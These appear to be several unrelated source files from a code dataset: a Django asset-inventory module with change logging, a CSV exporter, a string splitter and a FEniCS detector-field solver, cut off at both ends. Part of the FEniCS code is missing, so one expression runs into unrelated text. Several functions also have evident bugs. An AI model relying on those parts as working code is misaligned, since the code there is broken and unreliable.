self.create_asset()\r\n else:\r\n self.update_asset()\r\n pass\r\n elif self.response.status == 301:\r\n return False\r\n\r\n\r\n def _field_verify(self,data_set,key,data_type):\r\n #1,必须有值\r\n #2,必须能转换成指定类型\r\n asset_value=data_set.get(key)\r\n\r\n if asset_value:\r\n try:\r\n # print(type(data_set[key]),data_type,type(data_set[key]) is not data_type)\r\n if type(data_set[key]) is not data_type:\r\n data_set[key]=data_type(data_set[key])\r\n\r\n except Exception as e:\r\n # 403 值错误 类型不正确\r\n self.response.info_error(403,\"type[%s] type is error\"%data_set[key])\r\n else:\r\n #403 值错误 没找到值\r\n self.response.info_error(403, \"type[%s] value not required\" % data_set[key])\r\n\r\n def create_asset(self):\r\n try:\r\n func=getattr(self,\"_create_%s\"%self.clean_data[\"asset_type\"])\r\n func()\r\n except Exception as e:\r\n self.response.status = 402\r\n self.response.error = \"可能不支持%s资产\"%self.clean_data[\"asset_type\"]\r\n\r\n return False\r\n\r\n def update_asset(self):\r\n func=None\r\n try:\r\n func=getattr(self,\"_update_%s\"%self.clean_data[\"asset_type\"])\r\n except Exception as e:\r\n self.response.status = 402\r\n self.response.error = \"可能不支持%s资产\"%self.clean_data[\"asset_type\"]\r\n return False\r\n\r\n func()\r\n 
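# comment (added for clarity): create_asset()/update_asset() dispatch by name, e.g. getattr(self, \"_create_%s\" % \"server\") resolves to _create_server below, so supporting a new asset type only needs a matching _create_*/_update_* pair of methods\r\n    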
def _create_server(self):\r\n\r\n try:\r\n self.__create_server_info()\r\n self.__create_cpu_info()\r\n self.__create_ram_info()\r\n self.__create_nic_info()\r\n self.__create_disk_info()\r\n except Exception as e:\r\n pass\r\n else:\r\n models.NewAssetApprovalZone.objects.filter(sn=self.clean_data[\"sn\"]).update(approved=True)\r\n pass\r\n\r\n def _create_networkDevice(self):\r\n pass\r\n\r\n def _update_server(self):\r\n\r\n server=self._update_server_component()\r\n\r\n cpu=self._update_cpu_component()\r\n nic=self._update_asset_component(self.clean_data[\"nic\"],\"networkcard_set\",[\r\n \"ip_address\",\"model\",\"sn\",\"slot\"\r\n ],unique_key=\"mac_address\")\r\n\r\n disk=self._update_asset_component(self.clean_data[\"disk\"],\"disk_set\",[\r\n \"model\",\"manufacturer\",\"capacity\",\"slot\",\"iface_type\"\r\n ],unique_key=\"sn\")\r\n\r\n ram=self._update_asset_component(self.clean_data[\"ram\"],\"ram_set\",[\r\n \"model\",\"manufacturer\",\"capacity\",\"slot\"\r\n ],unique_key=\"sn\")\r\n\r\n\r\n if not self.response.error:\r\n self.response.info_error(200,\"no change\")\r\n\r\n def _update_server_component(self):\r\n updata_fields = [\"os_type\", \"manufacturer\"]\r\n asset_id = self.clean_data.get(\"asset_id\")\r\n obj = models.Server.objects.get(asset_id=asset_id)\r\n server_data = self.clean_data\r\n self.__compare_component(obj, server_data, updata_fields)\r\n pass\r\n def _update_cpu_component(self):\r\n updata_fields=[\"model\",\"cpu_count\",\"cpu_core_count\"]\r\n asset_id=self.clean_data.get(\"asset_id\")\r\n obj=models.CPU.objects.get(asset_id=asset_id)\r\n cpu_data=self.clean_data.get(\"cpu\")\r\n self.__compare_component(obj,cpu_data,updata_fields)\r\n\r\n\r\n\r\n\r\n def _update_asset_component(self,data_source,asset_fk,update_field,unique_key):\r\n #零件是列表的都放这里\r\n\r\n try:\r\n fk=getattr(self.asset_obj,asset_fk)\r\n except AttributeError as e:\r\n self.response.info_error(403, \"没有该外键[%s]\" % asset_fk)\r\n return False\r\n\r\n try:\r\n obj_list=getattr(fk,\"all\")() #[obj1,obj2]\r\n except AttributeError as e:\r\n self.response.info_error(403, \"[%s]不是外键\" % asset_fk)\r\n return False\r\n\r\n for obj in obj_list:\r\n obj_unique_field=getattr(obj,unique_key)#server unique value\r\n\r\n # if type(data_source) is list: # 如果客户端是以字典传过来,就得判断,这是公司不规范导致的代码量\r\n for data_dict in data_source:\r\n data_unique_field=data_dict.get(unique_key) #cliend unique value\r\n if data_unique_field == obj_unique_field:\r\n self.__compare_component(obj,data_dict,update_field)\r\n\r\n model_name=fk.model._meta.object_name.lower()\r\n self.add_or_del_component(component_name=model_name,\r\n client_data_list=data_source,\r\n db_data_list=obj_list,\r\n identify_field=unique_key)\r\n\r\n pass\r\n\r\n def __compare_component(self,model_obj,data_source,update_fields):\r\n '''\r\n 根据update_field来修改内容,转换data的类型\r\n :param model_obj:\r\n :param data_source:\r\n :param update_field:\r\n :return:\r\n '''\r\n for field in update_fields:\r\n model_field=getattr(model_obj,field)\r\n data_field=data_source.get(field)\r\n if data_field != None:\r\n if type(model_field) is int:\r\n data_field=int(data_field)\r\n elif type(model_field) is float:\r\n data_field = float(data_field)\r\n elif type(model_field) is str:\r\n data_field = str(data_field)\r\n\r\n from time import timezone\r\n if model_field == data_field:\r\n #没有变化\r\n pass\r\n else:\r\n db_field = model_obj._meta.get_field(field) # 找到该对象的字段\r\n db_field.save_form_data(model_obj, data_field) # 更新字段\r\n\r\n model_obj.update_date = 2 # 添加更新时间\r\n 
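# comment (added for clarity): the literal 2 assigned to update_date above looks like a stub; a real implementation would presumably store a timezone-aware timestamp here\r\n                    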
model_obj.save() # 保存\r\n\r\n # 记录哪个资产的哪个零件的哪条记录,从什么变成了什么\r\n event_msg=\"asset[%s]--->component[%s]--->field[%s],from[%s]to [%s]\"%(\r\n self.asset_obj,model_obj,field,model_field,data_field\r\n )\r\n self.response.info_error(200,event_msg)\r\n log_handler(self.asset_obj,'FieldChanged', self.request.user, event_msg, model_obj)\r\n else:\r\n #哪个零件的哪条字段没有\r\n self.response.info_error(403,\"asset[%s]---component[%s]---field[%s] is empty\"%(self.asset_obj,model_obj,field))\r\n\r\n\r\n def add_or_del_component(self,component_name,client_data_list,db_data_list,identify_field):\r\n #xxx(\"nic\",[nic1,nic2],[obj1,obj2],\"mac_address\")\r\n\r\n unique_data_list=set([data[identify_field] for data in client_data_list])\r\n unique_db_list=set(getattr(obj,identify_field) for obj in db_data_list)\r\n aa=unique_data_list-unique_db_list #客户端多出来的,add\r\n bb=unique_db_list-unique_data_list #数据库多出来的,del\r\n print(\"1--\", self.response.error)\r\n for data in client_data_list:\r\n for a_item in aa:\r\n if a_item == data[identify_field]:\r\n obj = getattr(self.asset_obj, \"%s_set\" % component_name.lower())\r\n\r\n\r\n try:\r\n\r\n obj.create(**data)\r\n\r\n event_msg=\"asset[%s]---component[%s] add a row[%s],success\\n\"%(\r\n self.asset_obj,obj,data[identify_field]\r\n )\r\n\r\n log_handler(self.asset_obj,\"NewComponentAdded\",self.request.user,detail=event_msg,component=obj)\r\n self.response.status=301\r\n self.response.error=\"\"\r\n self.response.error+=event_msg\r\n except Exception as e:\r\n self.response.status = 403\r\n\r\n event_msg_error = e.args\r\n self.response.error = event_msg_error\r\n return False\r\n\r\n for obj in db_data_list:\r\n for b_item in bb:\r\n if b_item == getattr(obj,identify_field):\r\n check_obj = getattr(self.asset_obj, \"%s_set\" % component_name.lower()).filter(\r\n **{identify_field: b_item})\r\n try:\r\n check_obj.delete()\r\n event_msg=\"asset[%s]---component[%s] delete a row[%s]\\n\"%(\r\n self.asset_obj,check_obj,b_item\r\n )\r\n log_handler(self.asset_obj,\"NewComponentAdded\",self.request.user,detail=event_msg,component=check_obj)\r\n self.response.status = 301\r\n self.response.error += event_msg\r\n except Exception as e:\r\n self.response.status = 403\r\n event_msg_error = e.args\r\n self.response.error = event_msg_error\r\n return False\r\n print(\"3--\", self.response.error)\r\n def _update_networkDevice(self):\r\n pass\r\n\r\n\r\n def __create_server_info(self):\r\n '''\r\n 1,创建资产\r\n 2,创建服务器\r\n :return:\r\n '''\r\n #判断必须的每条是否都有,错误信息存放在self.response中\r\n\r\n self._field_verify(self.clean_data,\"asset_type\",str)\r\n\r\n if not self.response.error: # 前面所有,只要有错误,就不往下执行\r\n try:\r\n\r\n asset_dict={\r\n \"asset_type\":self.clean_data[\"asset_type\"]\r\n }\r\n\r\n obj=models.Asset.objects.filter(id=self.clean_data[\"asset_id\"])\r\n\r\n obj.update(**asset_dict)\r\n self._field_verify(self.clean_data, \"asset_id\", int)\r\n server_dict={\r\n \"asset_id\":self.clean_data[\"asset_id\"],\r\n \"os_type\":self.clean_data[\"os_type\"],\r\n \"manufacturer\":self.clean_data[\"manufacturer\"]\r\n }\r\n\r\n obj=models.Server.objects.get_or_create(**server_dict)\r\n except Exception as e:\r\n #403 入数据库错误\r\n self.response.info_error(403,e.args)\r\n\r\n def __create_cpu_info(self):\r\n\r\n # self._field_verify(self.clean_data, \"model\", \"str\")\r\n self._field_verify(self.clean_data[\"cpu\"], \"cpu_count\", int)\r\n\r\n self._field_verify(self.clean_data[\"cpu\"], \"cpu_core_count\", int)\r\n\r\n if not self.response.error:\r\n try:\r\n cpu_dict={\r\n 
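# comment (added for clarity): collect the CPU fields reported by the client into one dict before instantiating models.CPU\r\n                    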
\"asset_id\":self.clean_data[\"asset_id\"],\r\n \"model\":self.clean_data[\"cpu\"][\"model\"],\r\n \"cpu_count\":self.clean_data[\"cpu\"][\"cpu_count\"],\r\n \"cpu_core_count\":self.clean_data[\"cpu\"][\"cpu_core_count\"],\r\n }\r\n\r\n obj=models.CPU(**cpu_dict)\r\n obj.save()\r\n except Exception as e:\r\n self.response.info_error(403, e.args)\r\n\r\n def __create_ram_info(self):\r\n\r\n\r\n for ram in self.clean_data[\"ram\"]:\r\n # self._field_verify(ram, \"model\", \"str\")\r\n self._field_verify(ram, \"slot\", str)\r\n self._field_verify(ram, \"capacity\", int)\r\n if not self.response.error:\r\n try:\r\n ram_dict={\r\n \"asset_id\": self.clean_data[\"asset_id\"],\r\n \"sn\": ram[\"sn\"],\r\n \"model\": ram[\"model\"],\r\n \"manufacturer\": ram[\"manufacturer\"],\r\n \"slot\": ram[\"slot\"],\r\n \"capacity\": ram[\"capacity\"],\r\n }\r\n obj=models.RAM(**ram_dict)\r\n obj.save()\r\n except Exception as e:\r\n self.response.info_error(403, e.args)\r\n else:\r\n return False\r\n\r\n def __create_nic_info(self):\r\n print(self.clean_data[\"nic\"])\r\n for nic in self.clean_data[\"nic\"]:\r\n self._field_verify(nic, \"mac_address\", str)\r\n if not self.response.error:\r\n try:\r\n nic_dict={\r\n \"asset_id\": self.clean_data[\"asset_id\"],\r\n \"mac_address\":nic[\"mac_address\"],\r\n \"ip_address\":nic[\"ip_address\"],\r\n \"sn\":nic[\"sn\"],\r\n \"model\":nic[\"model\"],\r\n \"slot\":nic[\"slot\"],\r\n }\r\n print(nic_dict)\r\n obj=models.NetworkCard(**nic_dict)\r\n obj.save()\r\n except Exception as e:\r\n self.response.info_error(403, e.args)\r\n else:\r\n return False\r\n\r\n\r\n\r\n\r\n def __create_disk_info(self):\r\n for disk in self.clean_data[\"disk\"]:\r\n self._field_verify(disk, \"sn\", str)\r\n self._field_verify(disk, \"slot\", str)\r\n self._field_verify(disk, \"capacity\", int)\r\n if not self.response.error:\r\n try:\r\n disk_dict={\r\n \"asset_id\": self.clean_data[\"asset_id\"],\r\n \"sn\": disk[\"sn\"],\r\n \"model\": disk[\"model\"],\r\n \"manufacturer\": disk[\"manufacturer\"],\r\n \"capacity\": disk[\"capacity\"],\r\n \"slot\": disk[\"slot\"],\r\n \"iface_type\": disk[\"capacity\"],\r\n }\r\n print(disk_dict)\r\n obj=models.Disk(**disk_dict)\r\n obj.save()\r\n except Exception as e:\r\n self.response.info_error(403, e.args)\r\n else:\r\n return False\r\n\r\ndef log_handler(asset_obj, event_name, user, detail, component=None):\r\n '''\r\n\r\n :param asset_obj: 资产\r\n :param event_name: 事件类型\r\n :param user: 事件用户\r\n :param detail: 事件详情\r\n :param component: 资产零件\r\n :return:\r\n '''\r\n ''' (1,u'硬件变更'),\r\n (2,u'新增配件'),\r\n (3,u'设备下线'),\r\n (4,u'设备上线'),'''\r\n log_catelog = {\r\n 1: ['FieldChanged', 'HardwareChanges'],\r\n 2: ['NewComponentAdded'],\r\n }\r\n if not user.id:\r\n #user = models.UserProfile.objects.filter(is_superuser=True).last()\r\n user = models.UserProfile.objects.last()\r\n\r\n print(\"user--------->\",user)\r\n event_type = None\r\n for k, v in log_catelog.items():\r\n if event_name in v:\r\n event_type = k\r\n break\r\n log_obj = models.EventLog(\r\n name=event_name,\r\n event_type=event_type,\r\n asset_id=asset_obj.id,\r\n component=component,\r\n detail=detail,\r\n user_id=user.id\r\n )\r\n\r\n log_obj.save()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"asset/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":21533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"529212413","text":"import csv\ndef save_to_file(jobs, word, option):\n print(\"I am in \")\n file = 
open(f\"{word}_jobs_in_ON_from_{option}.csv\", \"w\", -1,\"utf-8\", newline='')\n    writer = csv.writer(file)\n    writer.writerow(['number', 'title', 'company', 'location', 'link'])\n    i = 0\n    while i < len(jobs):\n        writer.writerow([i+1, jobs[i]['title'], jobs[i]['company'], jobs[i]['location'], jobs[i]['link']])\n        i += 1\n    file.close()\n    return\n","sub_path":"exporter.py","file_name":"exporter.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"346993198","text":"from __future__ import unicode_literals\n\ndef split_simple(text, sep):\n    from io import StringIO\n    b = StringIO()\n    i = iter(text)\n    try:\n        for c in i:\n            if c == '\\\\':\n                b.write(next(i))\n            elif c == sep:\n                yield b.getvalue()\n                b.seek(0)\n                b.truncate(0)\n            else:\n                b.write(c)\n    except StopIteration:\n        pass\n    last = b.getvalue()\n    if last:\n        yield last\n","sub_path":"x19290/lib/splitsimple.py","file_name":"splitsimple.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"232041812","text":"# -*- encoding: utf-8 -*-\r\n'''\r\n@Description: Calculate the weighting potential and electric field with fenics \r\n@Date : 2021/08/31 15:04:25\r\n@Author : tanyuhang\r\n@version : 1.0\r\n'''\r\n\r\nimport fenics\r\nimport mshr\r\nimport sys\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n#Calculate the weighting potential and electric field\r\nclass FenicsCal:\r\n\r\n    def __init__(self,my_d,fen_dic):\r\n        self.p_electric = []\r\n        self.w_p_electric = []\r\n        self.det_model = fen_dic['name']\r\n        self.fl_x=my_d.l_x/fen_dic['xyscale'] \r\n        self.fl_y=my_d.l_y/fen_dic['xyscale'] \r\n        self.fl_z=my_d.l_z\r\n        self.tol = 1e-14\r\n        m_sensor_box=self.fenics_space(my_d) \r\n        self.mesh3D = mshr.generate_mesh(m_sensor_box,fen_dic['mesh']) \r\n        self.V = fenics.FunctionSpace(self.mesh3D, 'P', 1)\r\n        self.fenics_p_electric(my_d)\r\n        self.fenics_p_w_electric(my_d)\r\n\r\n    def fenics_space(self,my_d):\r\n        \"\"\"\r\n        @description: \r\n            Define the fenics solver space \r\n        @param:\r\n            None\r\n        @Returns:\r\n            Fenics Box structure\r\n        @Modify:\r\n            2021/08/31\r\n        \"\"\"\r\n        if \"plugin3D\" in self.det_model:\r\n            self.sensor_range_confirm(my_d)\r\n            m_sensor = mshr.Box(fenics.Point(self.sx_l,self.sy_l, 0), \r\n                                fenics.Point(self.sx_r,self.sy_r, self.fl_z))\r\n            for i in range(len(my_d.e_tr)):\r\n                e_t_i = my_d.e_tr[i]\r\n                elec_n=mshr.Cylinder(fenics.Point(e_t_i[0],e_t_i[1],e_t_i[3]), \r\n                                     fenics.Point(e_t_i[0],e_t_i[1],e_t_i[4]),\r\n                                     e_t_i[2],e_t_i[2])\r\n                m_sensor =m_sensor - elec_n \r\n        elif \"planar3D\" in self.det_model:\r\n            m_sensor = mshr.Box(fenics.Point(0, 0, 0), \r\n                                fenics.Point(self.fl_x, self.fl_y, self.fl_z))\r\n        else:\r\n            print(\"sensor model is wrong\")\r\n            sys.exit()\r\n        return m_sensor \r\n    \r\n    def sensor_range_confirm(self,my_d):\r\n        \"\"\"\r\n        @description:\r\n            confirm the sensor range\r\n            along the x,y axes to avoid an oversized sensor box,\r\n            which would make the mesh unnecessarily complicated\r\n        @param:\r\n            xv_min - fenics sensor x left value\r\n            xv_max - fenics sensor x right value\r\n            yv_min - fenics sensor y left value\r\n            yv_max - fenics sensor y right value \r\n        @Modify:\r\n            2021/08/31\r\n        \"\"\" \r\n        xv_list=[]\r\n        yv_list=[]\r\n        rest_length=50 #um\r\n        length=0\r\n        for i in range(len(my_d.e_tr)):\r\n            e_t_i = my_d.e_tr[i]\r\n            xv_list.append(e_t_i[0])\r\n            yv_list.append(e_t_i[1])\r\n        ele_radius= e_t_i[2]\r\n        while length == 0:\r\n            xv_max 
= max(xv_list)+ele_radius+rest_length \r\n xv_min = min(xv_list)-ele_radius-rest_length \r\n yv_max = max(yv_list)+ele_radius+rest_length\r\n yv_min = min(yv_list)-ele_radius-rest_length \r\n if xv_max >= yv_max:\r\n yv_max = xv_max\r\n else:\r\n xv_max = yv_max\r\n if xv_min <= yv_min:\r\n yv_min = xv_min\r\n else:\r\n xv_min = yv_min\r\n if (xv_max > my_d.l_x or xv_min <0 \r\n or yv_max > my_d.l_y or yv_min < 0):\r\n rest_length -= 1\r\n else:\r\n length=1\r\n self.sx_l=xv_min \r\n self.sx_r=xv_max \r\n self.sy_l=yv_min \r\n self.sy_r=yv_max \r\n\r\n def fenics_p_electric(self,my_d): \r\n \"\"\"\r\n @description:\r\n Solve poisson equation to get potential and electric field\r\n @Modify:\r\n 2021/08/31\r\n \"\"\"\r\n if \"plugin3D\" in self.det_model:\r\n bc_l=[]\r\n bc_l = self.boundary_definition_3D(my_d,\"Possion\") \r\n elif \"planar3D\" in self.det_model:\r\n bc_l = self.boundary_definition_2D(my_d,\"Possion\")\r\n\r\n u = fenics.TrialFunction(self.V)\r\n v = fenics.TestFunction(self.V)\r\n f = fenics.Constant(self.f_value(my_d))\r\n a = fenics.dot(fenics.grad(u), fenics.grad(v))*fenics.dx\r\n L = f*v*fenics.dx\r\n # Compute solution\r\n self.u = fenics.Function(self.V)\r\n fenics.solve(a == L, self.u, bc_l,\r\n solver_parameters=dict(linear_solver='gmres',\r\n preconditioner='ilu'))\r\n #calculate electric field\r\n W = fenics.VectorFunctionSpace(self.mesh3D, 'P', 1)\r\n self.E_field = fenics.project(fenics.as_vector((self.u.dx(0),\r\n self.u.dx(1),\r\n self.u.dx(2))),W)\r\n\r\n def fenics_p_w_electric(self,my_d): \r\n \"\"\"\r\n @description:\r\n Solve Laplace equation to \r\n get weighting potential and weighting electric field\r\n @Modify:\r\n 2021/08/31\r\n \"\"\"\r\n if \"plugin3D\" in self.det_model:\r\n bc_l = []\r\n bc_l = self.boundary_definition_3D(my_d,\"Laplace\")\r\n elif \"planar3D\" in self.det_model:\r\n bc_l = self.boundary_definition_2D(my_d,\"Laplace\")\r\n # Define variational problem\r\n u_w = fenics.TrialFunction(self.V)\r\n v_w = fenics.TestFunction(self.V)\r\n f_w = fenics.Constant(0)\r\n a_w = fenics.dot(fenics.grad(u_w), fenics.grad(v_w))*fenics.dx\r\n L_w = f_w*v_w*fenics.dx\r\n # Compute solution\r\n self.u_w = fenics.Function(self.V)\r\n fenics.solve(a_w == L_w, self.u_w, bc_l)\r\n\r\n def boundary_definition_3D(self,my_d,model):\r\n \"\"\"\r\n @description:\r\n Get boundary definition of 3D detector with Possion and Laplace\r\n @Modify:\r\n 2021/08/31\r\n \"\"\"\r\n bc_l = []\r\n p_ele,n_ele=self.model_para(my_d,model)\r\n for i in range (len(my_d.e_tr)):\r\n e_i = my_d.e_tr[i]\r\n str_e = \"x[0]>={e_0}-{e_2} && x[0]<={e_0}+\"\\\r\n +\"{e_2} && x[1]>={e_1}-{e_2} && \"\\\r\n +\"x[1]<={e_1}+{e_2} && x[2]>={e_3} \\\r\n && x[2]<={e_4} && on_boundary\"\r\n elec_p = str_e.format(e_0=e_i[0], e_1=e_i[1],\r\n e_2=e_i[2], e_3=e_i[3],\r\n e_4=e_i[4])\r\n if e_i[5] == \"p\":\r\n bc = fenics.DirichletBC(self.V, p_ele, elec_p)\r\n else:\r\n bc = fenics.DirichletBC(self.V, n_ele, elec_p)\r\n bc_l.append(bc)\r\n return bc_l\r\n\r\n def boundary_definition_2D(self,my_d,model):\r\n \"\"\"\r\n @description:\r\n Get boundary definition of 2D detector with Possion and Laplace\r\n @Modify:\r\n 2021/08/31\r\n \"\"\"\r\n p_ele,n_ele=self.model_para(my_d,model)\r\n u_D = fenics.Expression('x[2] self.sx_r \r\n or py < self.sy_l or py > self.sy_r):\r\n out_range=True\r\n else:\r\n out_range=False\r\n elif \"planar3D\" in self.det_model:\r\n out_range=False\r\n return out_range\r\n \r\n def __del__(self):\r\n pass\r\n\r\n\r\nclass FenicsCal2D:\r\n\r\n def __init__(self,det):\r\n 
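# comment (added for clarity): det carries the mesh size (nx, ny), geometry (det_width, det_thin), doping profile and bias_voltage used throughout this 2-D solver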
\r\n self.det = det\r\n\r\n # poential & field\r\n self.potential_value_2d = []\r\n \r\n self.electric_field_x_position = [ [] for n in range(self.det.ny+1) ]\r\n self.electric_field_y_position = [ [] for n in range(self.det.ny) ]\r\n\r\n # weighting poential & weighting field\r\n self.weighting_potential_value_2d = []\r\n \r\n self.weighting_electric_field_x_value = [ [] for n in range(self.det.ny+1) ]\r\n self.weighting_electric_field_y_value = [ [] for n in range(self.det.ny) ]\r\n\r\n self.weighting_electric_field_x_position = [ [] for n in range(self.det.ny+1) ]\r\n self.weighting_electric_field_y_position = [ [] for n in range(self.det.ny) ]\r\n\r\n self.solve()\r\n #self.draw()\r\n\r\n def cal_possion(self):\r\n \r\n width = self.det.det_width\r\n thin = self.det.det_thin\r\n \r\n nx = self.det.nx\r\n ny = self.det.ny\r\n\r\n # Create mesh and function space\r\n mesh = fenics.RectangleMesh(fenics.Point(0, 0), fenics.Point(width, thin), nx, ny)\r\n V = fenics.FunctionSpace(mesh, \"P\", 1)\r\n\r\n # Define boundary condition\r\n u_D = fenics.Expression('x[1] < tol? det_voltage : 0', degree = 2,tol = 1E-14,det_voltage = self.det.bias_voltage)\r\n\r\n def boundary(x, on_boundary):\r\n return abs(x[1])<1E-14 or abs(x[1]-thin)<1E-14\r\n\r\n bc = fenics.DirichletBC(V, u_D, boundary)\r\n\r\n # Define variational problem\r\n u = fenics.TrialFunction(V)\r\n v = fenics.TestFunction(V)\r\n\r\n f = fenics.Expression(self.det.doping_epr,degree=2)\r\n a = fenics.dot(fenics.grad(u), fenics.grad(v))*fenics.dx\r\n L = f*v*fenics.dx #+ g*v*ds\r\n\r\n # Compute solution\r\n u = fenics.Function(V)\r\n fenics.solve(a == L, u, bc)\r\n\r\n potential_value_1d = u.compute_vertex_values()\r\n potential_value_2d = np.array(potential_value_1d).reshape(ny+1,nx+1)\r\n\r\n self.potential_value_2d = potential_value_2d\r\n self.potential_value_1d = potential_value_1d\r\n\r\n # print(self.potential_value_2d)\r\n\r\n\r\n def cal_weighting_possion(self):\r\n\r\n width = self.det.det_width\r\n thin = self.det.det_thin\r\n \r\n nx = self.det.nx\r\n ny = self.det.ny\r\n\r\n # Create mesh and function space\r\n mesh = fenics.RectangleMesh(fenics.Point(0, 0), fenics.Point(width, thin), nx, ny)\r\n V = fenics.FunctionSpace(mesh, \"P\", 1)\r\n\r\n # Define boundary condition\r\n u_D = fenics.Expression('x[1] < tol? 
det_voltage : 0', degree = 2,tol = 1E-14,det_voltage = self.det.bias_voltage/abs(self.det.bias_voltage))\r\n\r\n def boundary(x, on_boundary):\r\n return abs(x[1])<1E-14 or abs(x[1]-thin)<1E-14\r\n\r\n bc = fenics.DirichletBC(V, u_D, boundary)\r\n\r\n # Define variational problem\r\n u = fenics.TrialFunction(V)\r\n v = fenics.TestFunction(V)\r\n\r\n f = fenics.Constant(0)\r\n a = fenics.dot(fenics.grad(u), fenics.grad(v))*fenics.dx\r\n L = f*v*fenics.dx #+ g*v*ds\r\n\r\n # Compute solution\r\n u = fenics.Function(V)\r\n fenics.solve(a == L, u, bc)\r\n\r\n weighting_potential_value_1d = u.compute_vertex_values()\r\n weighting_potential_value_2d = np.array(weighting_potential_value_1d).reshape(ny+1,nx+1)\r\n\r\n self.weighting_potential_value_2d = weighting_potential_value_2d\r\n self.weighting_potential_value_1d = weighting_potential_value_1d\r\n\r\n return weighting_potential_value_1d\r\n\r\n def cal_electric_field(self):\r\n\r\n width = self.det.det_width\r\n thin = self.det.det_thin\r\n \r\n nx = self.det.nx+1\r\n ny = self.det.ny+1\r\n\r\n x_step = width/nx\r\n y_step = thin/ny\r\n\r\n self.p_w_electric = [ [] for n in range(nx) ]\r\n self.p_electric = [ [] for n in range(nx) ]\r\n self.x_position = [ [] for n in range(nx) ]\r\n self.y_position = [ [] for n in range(nx) ]\r\n\r\n for j in range(ny):\r\n for i in range(nx):\r\n self.x_position[i].append(x_step*(i))\r\n self.y_position[i].append(y_step*(j))\r\n if (j==0):\r\n self.p_w_electric[i].append(0)\r\n self.p_electric[i].append(self.det.bias_voltage)\r\n elif(j==ny-1):\r\n self.p_w_electric[i].append(1)\r\n self.p_electric[i].append(0)\r\n else:\r\n self.p_w_electric[i].append(self.weighting_potential_value_1d[i+j*nx])\r\n self.p_electric[i].append(self.potential_value_1d[i+j*nx])\r\n\r\n def cal_field(self):\r\n\r\n nx = self.det.nx\r\n ny = self.det.ny\r\n\r\n width = self.det.det_width\r\n thin = self.det.det_thin\r\n\r\n x_step = width/nx\r\n y_step = thin/ny\r\n\r\n self.electric_field_x_position = [[]for n in range(nx)]\r\n self.electric_field_y_position = [[]for n in range(nx)]\r\n self.electric_field_x_value = [[]for n in range(nx)]\r\n self.electric_field_y_value = [[]for n in range(nx)]\r\n\r\n for j in range(ny):\r\n for i in range(nx):\r\n self.electric_field_x_position[i].append(0.5*x_step*(2*i+1))\r\n self.electric_field_y_position[i].append(0.5*y_step*(2*j+1))\r\n self.electric_field_x_value[i].append((self.p_electric[i+1][j]-self.p_electric[i][j])/x_step)\r\n self.electric_field_y_value[i].append((self.p_electric[i][j+1]-self.p_electric[i][j])/y_step)\r\n\r\n def cal_point_field(self,px_point,py_point,input_value):\r\n\r\n width = self.det.det_width\r\n thin = self.det.det_thin\r\n \r\n nx = self.det.nx\r\n ny = self.det.ny\r\n\r\n x_step = width/nx\r\n y_step = thin/ny\r\n\r\n #Interpolation method \r\n rex_value=px_point%x_step\r\n nx_value=int(px_point/x_step)\r\n rey_value=py_point%y_step\r\n ny_value=int(py_point/y_step)\r\n\r\n if(rex_value>x_step/2):\r\n e_v_x1=rex_value-x_step/2\r\n nx1_v=nx_value\r\n nx2_v=nx_value+1\r\n else:\r\n e_v_x1=rex_value+x_step/2\r\n e_v_x2=x_step-e_v_x1\r\n nx1_v=nx_value-1\r\n nx2_v=nx_value\r\n\r\n if(rey_value>y_step/2):\r\n e_v_y1=rey_value-y_step/2\r\n ny1_v=ny_value\r\n ny2_v=ny_value+1\r\n else:\r\n e_v_y1=rey_value+y_step/2\r\n e_v_y2=y_step-e_v_y1\r\n ny1_v=ny_value-1\r\n ny2_v=ny_value\r\n\r\n if (nx_value<=0):\r\n r_u=0\r\n nx1_v=nx2_v\r\n elif (nx_value>=nx-1):\r\n r_u=0\r\n nx2_v=nx1_v\r\n else:\r\n r_u=e_v_x1/x_step\r\n\r\n if (ny_value<=0):\r\n r_t=0\r\n 
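# comment (added for clarity): the point sits in the first row of cells, so there is no lower neighbour and the bilinear interpolation collapses onto the boundary cell\r\n            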
ny1_v=ny2_v\r\n elif (ny_value>=ny-1):\r\n r_t=0\r\n ny2_v=ny1_v\r\n else:\r\n r_t=e_v_y1/y_step\r\n\r\n value_11=input_value[nx1_v][ny1_v]\r\n value_21=input_value[nx1_v][ny2_v]\r\n value_12=input_value[nx1_v][ny1_v]\r\n value_22=input_value[nx1_v][ny2_v]\r\n out_field=0.0\r\n out_field=(1-r_u)*(1-r_t)*value_11\r\n out_field+=r_u*(1-r_t)*value_21\r\n out_field+=r_u*r_t*value_22\r\n out_field+=(1-r_u)*r_t*value_12\r\n\r\n return out_field \r\n\r\n\r\n def solve(self):\r\n\r\n self.cal_possion()\r\n self.cal_weighting_possion()\r\n self.cal_electric_field()\r\n self.cal_field()\r\n\r\n def draw(self):\r\n\r\n cutline = int(self.det.nx/2.0)\r\n\r\n plt.figure(figsize=(20,20))\r\n\r\n plt.subplot(2,2,1)\r\n plt.title('Electric field')\r\n plt.xlabel('depth [um]')\r\n plt.ylabel('Electric field [V/um]')\r\n plt.plot(self.electric_field_y_position[cutline],self.electric_field_y_value[cutline])\r\n\r\n plt.subplot(2,2,2)\r\n plt.title('Electric field')\r\n plt.xlabel('X [um]')\r\n plt.ylabel('Electric field [V/um]')\r\n plt.plot(self.electric_field_x_position[1],self.electric_field_x_value[1])\r\n\r\n plt.subplot(2,2,3)\r\n plt.title('weighting potential')\r\n plt.xlabel('depth [um]')\r\n plt.ylabel('Electric potential [V]')\r\n plt.plot(self.y_position[0], self.p_w_electric[0])\r\n\r\n plt.subplot(2,2,4)\r\n plt.title('potential')\r\n plt.xlabel('depth [um]')\r\n plt.ylabel('Electric potential [V]')\r\n plt.plot(self.y_position[0], self.p_electric[0])\r\n\r\n plt.savefig(\"electric_field.pdf\")\r\n","sub_path":"raser/pyfenics.py","file_name":"pyfenics.py","file_ext":"py","file_size_in_byte":20064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"359652273","text":"import itertools\n\n\nclass Transition:\n \"\"\"\n A transition between two states.\n \"\"\"\n\n def __init__(self, source, target, condition):\n \"\"\"\n Create a new 